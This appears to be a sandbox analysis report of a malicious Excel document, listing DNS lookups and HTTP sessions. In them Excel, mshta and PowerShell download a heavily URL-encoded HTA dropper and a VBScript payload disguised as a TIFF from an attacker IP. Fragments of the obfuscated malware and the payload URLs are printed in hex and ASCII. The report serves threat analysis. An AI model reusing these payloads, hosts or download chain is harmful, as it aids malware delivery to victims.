                                                                                                  Oct 30, 2024 08:04:23.465176105 CET5291753192.168.2.228.8.8.8
                                                                                                  Oct 30, 2024 08:04:23.476526022 CET53529178.8.8.8192.168.2.22
                                                                                                  Oct 30, 2024 08:04:38.461086035 CET6275153192.168.2.228.8.8.8
                                                                                                  Oct 30, 2024 08:04:38.470499039 CET53627518.8.8.8192.168.2.22
                                                                                                  Oct 30, 2024 08:04:40.364500999 CET5789353192.168.2.228.8.8.8
                                                                                                  Oct 30, 2024 08:04:40.374711990 CET53578938.8.8.8192.168.2.22
                                                                                                  Oct 30, 2024 08:04:41.855241060 CET5482153192.168.2.228.8.8.8
                                                                                                  Oct 30, 2024 08:04:41.866045952 CET53548218.8.8.8192.168.2.22
                                                                                                  Oct 30, 2024 08:04:41.868609905 CET5482153192.168.2.228.8.8.8
                                                                                                  Oct 30, 2024 08:04:41.879251957 CET53548218.8.8.8192.168.2.22
                                                                                                  Oct 30, 2024 08:04:55.895068884 CET5471953192.168.2.228.8.8.8
                                                                                                  Oct 30, 2024 08:04:55.903311014 CET53547198.8.8.8192.168.2.22
                                                                                                  Oct 30, 2024 08:04:57.415102959 CET4988153192.168.2.228.8.8.8
                                                                                                  Oct 30, 2024 08:04:57.424318075 CET53498818.8.8.8192.168.2.22

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 30, 2024 08:04:21.083990097 CET192.168.2.228.8.8.80x7ef0Standard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:23.465176105 CET192.168.2.228.8.8.80xb3e6Standard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:38.461086035 CET192.168.2.228.8.8.80x3d2cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:40.364500999 CET192.168.2.228.8.8.80xa7f5Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:41.855241060 CET192.168.2.228.8.8.80x21bdStandard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:41.868609905 CET192.168.2.228.8.8.80x21bdStandard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:55.895068884 CET192.168.2.228.8.8.80x3746Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:57.415102959 CET192.168.2.228.8.8.80x6e24Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 30, 2024 08:04:21.095675945 CET8.8.8.8192.168.2.220x7ef0No error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:21.095675945 CET8.8.8.8192.168.2.220x7ef0No error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:23.476526022 CET8.8.8.8192.168.2.220xb3e6No error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:23.476526022 CET8.8.8.8192.168.2.220xb3e6No error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:38.470499039 CET8.8.8.8192.168.2.220x3d2cNo error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:40.374711990 CET8.8.8.8192.168.2.220xa7f5No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:41.866045952 CET8.8.8.8192.168.2.220x21bdNo error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:41.866045952 CET8.8.8.8192.168.2.220x21bdNo error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:41.879251957 CET8.8.8.8192.168.2.220x21bdNo error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:41.879251957 CET8.8.8.8192.168.2.220x21bdNo error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:55.903311014 CET8.8.8.8192.168.2.220x3746No error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                  Oct 30, 2024 08:04:57.424318075 CET8.8.8.8192.168.2.220x6e24No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • acesso.run
                                                                                                  • drive.google.com
                                                                                                  • drive.usercontent.google.com
                                                                                                  • 198.46.178.151
                                                                                                  • 94.156.177.220

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.2249164198.46.178.151803268C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:04:22.240860939 CET352OUTGET /66/gb/greatthingswithmegood.hta HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Host: 198.46.178.151
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 30, 2024 08:04:22.915942907 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 30 Oct 2024 07:04:22 GMT
                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                  Last-Modified: Wed, 30 Oct 2024 04:43:43 GMT
                                                                                                  ETag: "2a437-625aa58b90e12"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 173111
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/hta
                                                                                                  Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 35 32 38 25 32 35 32 35 32 32 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 32 35 33 44 25 32 35 32 35 [TRUNCATED]
                                                                                                  Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CSCrIpT%25252520lanGuAgE%2525253D%25252522VbScRiPt%25252522%2525253E%2525250AdIM%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                                                                                  Oct 30, 2024 08:04:22.915983915 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                                                                                  Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                                                                                  Oct 30, 2024 08:04:22.915997028 CET424INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                                  Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                                                                                  Oct 30, 2024 08:04:22.916115046 CET1236INData Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                                                  Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                                                                                  Oct 30, 2024 08:04:22.916129112 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                                                                                  Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                                                                                  Oct 30, 2024 08:04:22.916146994 CET424INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                                  Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                                                                                  Oct 30, 2024 08:04:22.916280985 CET1236INData Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                                                  Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
                                                                                                  Oct 30, 2024 08:04:22.916292906 CET1236INData Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32
                                                                                                  Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
                                                                                                  Oct 30, 2024 08:04:22.916305065 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35
                                                                                                  Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
                                                                                                  Oct 30, 2024 08:04:22.916477919 CET636INData Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                                                  Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520vvhpwunqqczkbvyktcokkjetzuqflgcqgdxdxqyrwlvllgwxhaxzwclhksiuuwdxdfkjbl
                                                                                                  Oct 30, 2024 08:04:22.921333075 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                                  Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.2249166198.46.178.151803572C:\Windows\System32\mshta.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:04:24.485846043 CET429OUTGET /66/gb/greatthingswithmegood.hta HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Range: bytes=8896-
                                                                                                  Connection: Keep-Alive
                                                                                                  Host: 198.46.178.151
                                                                                                  If-Range: "2a437-625aa58b90e12"
                                                                                                  Oct 30, 2024 08:04:25.146680117 CET1236INHTTP/1.1 206 Partial Content
                                                                                                  Date: Wed, 30 Oct 2024 07:04:25 GMT
                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                  Last-Modified: Wed, 30 Oct 2024 04:43:43 GMT
                                                                                                  ETag: "2a437-625aa58b90e12"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 164215
                                                                                                  Content-Range: bytes 8896-173110/173111
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/hta
                                                                                                  Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 [TRUNCATED]
                                                                                                  Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520vvhpwunqqczkbvyktcokkjetzuqflgcqgdxdxqyrwlvllgwxhaxzwclhksiuuwdxdfkjblrvxscjjkwkehnynpuvxpklglloddqqmtfziysnxvkraxiomiqfflukyomjyynehbyvwepdhaummxgcywifwikzbsqdfqzgryfedlqmqnnqfhfvbsipqgclsmhppgxeuxnuuttxdwywwdcaylzedfwcciwntvegumem%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                                                  Oct 30, 2024 08:04:25.146697044 CET1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35
                                                                                                  Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
                                                                                                  Oct 30, 2024 08:04:25.146709919 CET424INData Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                                  Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525
                                                                                                  Oct 30, 2024 08:04:25.146760941 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                                  Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                                                                                  Oct 30, 2024 08:04:25.146775961 CET1236INData Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                                                                                  Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
                                                                                                  Oct 30, 2024 08:04:25.146790028 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                                                                                  Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                                                                                  Oct 30, 2024 08:04:25.146805048 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                                  Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520SEt%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25
                                                                                                  Oct 30, 2024 08:04:25.147007942 CET1236INData Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                                  Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252
                                                                                                  Oct 30, 2024 08:04:25.147021055 CET1060INData Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                                                                                  Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
                                                                                                  Oct 30, 2024 08:04:25.147032976 CET1236INData Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25
                                                                                                  Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
                                                                                                  Oct 30, 2024 08:04:25.152410030 CET1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32
                                                                                                  Data Ascii: 252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.2249167198.46.178.151803656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:04:31.669406891 CET377OUTGET /66/seemethebestthingswithgreatneedswithgoodformewith.tIF HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Host: 198.46.178.151
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 30, 2024 08:04:32.340256929 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 30 Oct 2024 07:04:32 GMT
                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                  Last-Modified: Wed, 30 Oct 2024 04:37:20 GMT
                                                                                                  ETag: "22a56-625aa41e97181"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 141910
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: image/tiff
                                                                                                  Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 6e 00 74 00 72 00 6f 00 76 00 69 00 73 00 63 00 61 00 64 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 [TRUNCATED]
                                                                                                  Data Ascii: private function CreateSession(wsman, conStr, optDic, entroviscada) dim pelotaFlags dim conOpt dim pelota dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword pelotaFlags = 0 proxyAccessType =
                                                                                                  Oct 30, 2024 08:04:32.340281963 CET1236INData Raw: 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41
                                                                                                  Data Ascii: 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0 proxyUs
